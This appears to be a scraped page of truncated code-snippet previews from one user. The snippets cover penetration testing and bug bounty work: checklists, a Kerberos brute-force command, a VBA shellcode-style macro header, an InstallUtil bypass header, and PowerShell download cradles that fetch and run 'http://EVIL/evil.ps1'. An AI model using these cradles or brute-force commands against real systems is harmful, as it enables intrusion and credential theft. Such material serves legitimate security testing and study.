davehardy20

from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests

DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

class PanCrypt():

davehardy20

Bug Bounty Checklist and Cheatsheets

WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf

Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf

Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html

File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf

davehardy20

site.com/file.php
response = nothing

http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours, 

davehardy20

site.com/file.php
response = nothing

http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours, 

davehardy20

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

davehardy20

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace HiddenEventLogs
{

davehardy20

' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&

davehardy20

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

davehardy20

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

davehardy20

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

• The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)